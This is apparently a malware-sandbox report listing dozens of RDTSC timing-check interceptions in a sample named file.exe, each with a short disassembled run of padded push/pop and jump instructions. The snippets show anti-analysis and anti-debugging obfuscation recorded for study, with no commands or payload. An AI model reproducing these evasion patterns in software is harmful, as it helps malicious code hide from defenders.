                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027210 second address: 102724D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92479h 0x00000007 jmp 00007F8114B9246Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8114B92470h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102724D second address: 1027251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9A04 second address: FF9A09 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C047 second address: 107C04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C04D second address: 107C056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CB71 second address: 102665F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8114E11BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F8114E11BF0h 0x00000010 nop 0x00000011 xor edi, dword ptr [ebp+122D5931h] 0x00000017 call dword ptr [ebp+122D2BFFh] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8114E11BF4h 0x00000024 push edi 0x00000025 jc 00007F8114E11BE6h 0x0000002b pop edi 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D181 second address: 103D1AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8114B9246Ch 0x00000008 je 00007F8114B92466h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push ebx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ebx 0x00000019 jnl 00007F8114B9246Ch 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push ebx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D1AD second address: 103D1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F8114E11BEFh 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 stc 0x00000013 mov esi, dword ptr [ebp+122D3AA6h] 0x00000019 popad 0x0000001a pop edx 0x0000001b push DE2256ABh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jbe 00007F8114E11BE6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D1E1 second address: 103D1EB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D1EB second address: 103D1F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D5CA second address: 103D602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 adc ecx, 6C3C07ABh 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F8114B92468h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b nop 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D949 second address: 103D94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D94D second address: 103D957 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D957 second address: 103D9D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114E11BE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F8114E11BF4h 0x00000011 push edi 0x00000012 jmp 00007F8114E11BECh 0x00000017 pop edi 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F8114E11BE8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push 0000001Eh 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F8114E11BE8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov edx, 50A67A94h 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F8114E11BF5h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D9D9 second address: 103D9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DB71 second address: 103DB75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DDA7 second address: 103DDED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8114B92468h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F8114B9246Eh 0x00000014 lea eax, dword ptr [ebp+1247E90Ch] 0x0000001a mov ecx, 6DEA69C1h 0x0000001f movsx edi, dx 0x00000022 push eax 0x00000023 pushad 0x00000024 jns 00007F8114B92468h 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d jmp 00007F8114B9246Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DDED second address: 103DE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edx, ax 0x0000000c lea eax, dword ptr [ebp+1247E8C8h] 0x00000012 jmp 00007F8114E11BF7h 0x00000017 nop 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DE1C second address: 103DE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DE20 second address: 10271D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8114E11BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e jng 00007F8114E11BE6h 0x00000014 jmp 00007F8114E11BECh 0x00000019 popad 0x0000001a pop ebx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F8114E11BE8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov ecx, esi 0x00000038 cmc 0x00000039 call dword ptr [ebp+124508AAh] 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F8114E11BF0h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B17B second address: 107B195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114B92476h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B195 second address: 107B1A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B1A1 second address: 107B1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B496 second address: 107B49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B49C second address: 107B4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5F0 second address: 107B5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5F6 second address: 107B5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5FA second address: 107B5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5FE second address: 107B607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B8A0 second address: 107B8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007F8114E11BE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B8B0 second address: 107B8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 jc 00007F8114B92466h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B8C2 second address: 107B8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BA2D second address: 107BA5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8114B92472h 0x0000000c push edx 0x0000000d jne 00007F8114B92466h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 jo 00007F8114B92488h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BA5A second address: 107BA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BBBD second address: 107BBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084E21 second address: 1084E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8114E11BE6h 0x0000000a ja 00007F8114E11BE6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084E36 second address: 1084E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084E3A second address: 1084E5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8114E11BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F8114E11BF3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083B19 second address: 1083B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Fh 0x00000007 jp 00007F8114B9246Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C63 second address: 1083C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C67 second address: 1083C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007F8114B92466h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C76 second address: 1083C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10840DC second address: 10840E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084236 second address: 108423C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108423C second address: 1084248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084248 second address: 108425D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF0h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10847B8 second address: 10847BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086CB4 second address: 1086CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8114E11BE6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F8114E11BE6h 0x00000013 jmp 00007F8114E11BF8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086CDF second address: 1086CE9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086CE9 second address: 1086CEE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086E53 second address: 1086E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8114B92476h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089C16 second address: 1089C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089D58 second address: 1089D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089E96 second address: 1089E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A018 second address: 108A01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A01C second address: 108A028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A028 second address: 108A02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E435 second address: 108E43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E43E second address: 108E49A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8114B92495h 0x00000008 jmp 00007F8114B92477h 0x0000000d jmp 00007F8114B92478h 0x00000012 jg 00007F8114B9246Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jc 00007F8114B92466h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007F8114B9246Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E49A second address: 108E4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8114E11BF7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094759 second address: 1094764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F8114B92466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094764 second address: 109476C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932DD second address: 10932E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932E1 second address: 10932E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109346D second address: 1093476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10935BB second address: 10935CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8114E11BEDh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10935CF second address: 10935DC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10935DC second address: 1093615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jne 00007F8114E11BECh 0x0000000d jo 00007F8114E11BE6h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F8114E11BEFh 0x0000001a pushad 0x0000001b jmp 00007F8114E11BF2h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093615 second address: 109362B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114B9246Ch 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10937B7 second address: 10937BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10937BB second address: 10937BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10937BF second address: 10937E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F8114E11BF1h 0x0000000e push eax 0x0000000f pop eax 0x00000010 je 00007F8114E11BE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D75C second address: 103D761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D761 second address: 103D772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8114E11BEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D772 second address: 103D776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D83F second address: 103D84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D84B second address: 103D850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093AB1 second address: 1093AC1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8114E11BF2h 0x00000008 jnl 00007F8114E11BE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10977E3 second address: 10977F3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097D27 second address: 1097D33 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114E11BEEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097EA5 second address: 1097EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097EA9 second address: 1097EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0842 second address: 10A086D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8114B92479h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F8114B92466h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A086D second address: 10A0871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FA0B second address: 109FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FFA1 second address: 109FFA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FFA6 second address: 109FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FFAC second address: 109FFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A027E second address: 10A02A3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 jmp 00007F8114B92475h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02A3 second address: 10A02A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A522B second address: 10A5233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8279 second address: 10A82A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F8114E11BFFh 0x0000000d jl 00007F8114E11BECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
